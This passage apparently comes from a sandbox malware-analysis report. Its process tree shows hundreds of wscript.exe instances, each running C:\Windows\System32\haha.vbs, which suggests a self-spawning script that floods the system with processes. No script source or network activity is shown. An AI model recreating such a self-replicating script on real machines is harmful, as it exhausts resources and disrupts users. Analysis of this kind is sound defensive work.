        334⤵
        
        PID:14900
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        335⤵
        
        PID:2112
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        336⤵
        
        PID:12176
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        337⤵
        
        PID:14848
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        338⤵
        
        PID:1748
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        339⤵
        
        PID:3908
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        340⤵
        
        PID:15368
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        341⤵
        
        PID:15404
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        342⤵
        
        PID:15552
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        343⤵
        
        PID:15628
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        344⤵
        
        PID:15672
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        345⤵
        
        PID:15788
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        346⤵
        
        PID:15900
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        347⤵
        
        PID:15944
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        348⤵
        
        PID:15996
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        349⤵
        
        PID:16168
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        350⤵
        
        PID:16252
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        351⤵
        
        PID:16300
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        352⤵
        
        PID:16340
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        353⤵
        
        PID:15516
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        354⤵
        
        PID:15568
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        355⤵
        
        PID:4512
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        356⤵
        
        PID:15856
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        357⤵
        
        PID:6212
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        358⤵
        
        PID:16100
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        359⤵
        
        PID:16124
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        360⤵
        
        PID:15420
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        361⤵
        
        PID:5456
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        362⤵
        
        PID:11992
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        363⤵
        
        PID:15776
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        364⤵
        
        PID:16204
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        365⤵
        
        PID:16140
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        366⤵
        
        PID:15456
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        367⤵
        
        PID:16068
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        368⤵
        
        PID:15720
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        369⤵
        
        PID:16164
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        370⤵
        
        PID:13296
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        371⤵
        
        PID:6960
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        372⤵
        
        PID:5424
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        373⤵
        
        PID:5944
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        374⤵
        
        PID:15812
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        375⤵
        
        PID:7744
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        376⤵
        
        PID:6540
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        377⤵
        
        PID:3156
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        378⤵
        
        PID:16400
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        379⤵
        
        PID:16452
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        380⤵
        
        PID:16496
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        381⤵
        
        PID:16548
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        382⤵
        
        PID:16592
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        383⤵
        
        PID:16636
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        384⤵
        
        PID:16676
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        385⤵
        
        PID:16728
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        386⤵
        
        PID:16764
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        387⤵
        
        PID:16800
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        388⤵
        
        PID:16836
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        389⤵
        
        PID:16880
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        390⤵
        
        PID:16924
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        391⤵
        
        PID:16968
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        392⤵
        
        PID:17016
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        393⤵
        
        PID:17056
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        394⤵
        
        PID:17092
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        395⤵
        
        PID:17136
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        396⤵
        
        PID:17180
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        397⤵
        
        PID:17224
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        398⤵
        
        PID:17268
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        399⤵
        
        PID:17312
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        400⤵
        
        PID:17356
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        401⤵
        
        PID:17400
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        402⤵
        
        PID:15472
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        403⤵
        
        PID:16444
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        404⤵
        
        PID:16576
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        405⤵
        
        PID:12588
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        406⤵
        
        PID:13564
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        407⤵
        
        PID:3800
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        408⤵
        
        PID:13736
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        409⤵
        
        PID:13916
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        410⤵
        
        PID:17296
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        411⤵
        
        PID:16428
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        412⤵
        
        PID:8980
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        413⤵
        
        PID:10016
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        414⤵
        
        PID:17448
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        415⤵
        
        PID:17492
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        416⤵
        
        PID:17528
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        417⤵
        
        PID:17580
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        418⤵
        
        PID:17640
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        419⤵
        
        PID:17696
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        420⤵
        
        PID:17748
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        421⤵
        
        PID:17800
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        422⤵
        
        PID:17836
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        423⤵
        
        PID:17908
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        424⤵
        
        PID:17948
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        425⤵
        
        PID:18008
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        426⤵
        
        PID:18056
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        427⤵
        
        PID:18096
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        428⤵
        
        PID:18168
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        429⤵
        
        PID:18216
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        430⤵
        
        PID:18264
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        431⤵
        
        PID:18312
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        432⤵
        
        PID:18348
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        433⤵
        
        PID:18392
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        434⤵
        
        PID:17440
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        435⤵
        
        PID:8820
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        436⤵
        
        PID:17680
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        437⤵
        
        PID:9556
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        438⤵
        
        PID:17604
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        439⤵
        
        PID:14616
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        440⤵
        
        PID:18116
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        441⤵
        
        PID:9504
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        442⤵
        
        PID:18420
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        443⤵
        
        PID:18424
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        444⤵
        
        PID:17664
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        445⤵
        
        PID:8508
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        446⤵
        
        PID:1528
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        447⤵
        
        PID:10508
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        448⤵
        
        PID:17984
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        449⤵
        
        PID:10920
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        450⤵
        
        PID:11028
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        451⤵
        
        PID:10304
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        452⤵
        
        PID:10080
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        453⤵
        
        PID:3516
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        454⤵
        
        PID:18448
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        455⤵
        
        PID:18492
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        456⤵
        
        PID:18536
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        457⤵
        
        PID:18580
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        458⤵
        
        PID:18616
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        459⤵
        
        PID:18660
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        460⤵
        
        PID:18704
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        461⤵
        
        PID:18748
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        462⤵
        
        PID:18784
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        463⤵
        
        PID:18832
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        464⤵
        
        PID:18872
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        465⤵
        
        PID:18920
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        466⤵
        
        PID:18968
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        467⤵
        
        PID:19008
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        468⤵
        
        PID:19056
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        469⤵
        
        PID:19100
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        470⤵
        
        PID:19136
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        471⤵
        
        PID:19180
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        472⤵
        
        PID:19232
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        473⤵
        
        PID:19268
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        474⤵
        
        PID:19312
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        475⤵
        
        PID:19356
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        476⤵
        
        PID:19392
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        477⤵
        
        PID:19436
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        478⤵
        
        PID:18484
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        479⤵
        
        PID:18572
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        480⤵
        
        PID:11212
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        481⤵
        
        PID:10716
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        482⤵
        
        PID:472
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        483⤵
        
        PID:18908
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        484⤵
        
        PID:9692
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        485⤵
        
        PID:11088
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        486⤵
        
        PID:10480
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        487⤵
        
        PID:5512
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        488⤵
        
        PID:16120
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        489⤵
        
        PID:11372
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        490⤵
        
        PID:10548
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        491⤵
        
        PID:6824
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        492⤵
        
        PID:11896
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        493⤵
        
        PID:12136
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        494⤵
        
        PID:10992
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        495⤵
        
        PID:12372
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        496⤵
        
        PID:15536
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        497⤵
        
        PID:12524
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        498⤵
        
        PID:16152
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        499⤵
        
        PID:13004
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        500⤵
        
        PID:13144
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        501⤵
        
        PID:12304
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        502⤵
        
        PID:4284
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        503⤵
        
        PID:12532
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        504⤵
        
        PID:19512
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        505⤵
        
        PID:19572
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        506⤵
        
        PID:19632
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        507⤵
        
        PID:19696
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        508⤵
        
        PID:19752
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        509⤵
        
        PID:19812
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        510⤵
        
        PID:19876
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        511⤵
        
        PID:19936
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        512⤵
        
        PID:20000
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        513⤵
        
        PID:20040
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        514⤵
        
        PID:20100
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        515⤵
        
        PID:20152
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        516⤵
        
        PID:20204
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        517⤵
        
        PID:20248
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        518⤵
        
        PID:20300
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        519⤵
        
        PID:20344
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        520⤵
        
        PID:20384
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        521⤵
        
        PID:20428
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        522⤵
        
        PID:20472
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        523⤵
        
        PID:7152
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        524⤵
        
        PID:680
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        525⤵
        
        PID:7476
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        526⤵
        
        PID:5116
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        527⤵
        
        PID:16572
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        528⤵
        
        PID:12348
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        529⤵
        
        PID:19668
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        530⤵
        
        PID:12676
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        531⤵
        
        PID:13264
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        532⤵
        
        PID:12324
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        533⤵
        
        PID:20092
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        534⤵
        
        PID:17164
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        535⤵
        
        PID:13284
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        536⤵
        
        PID:8424
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        537⤵
        
        PID:12572
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        538⤵
        
        PID:13216
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        539⤵
        
        PID:5056
        
        C:\Windows\System32\wscript.exe
        
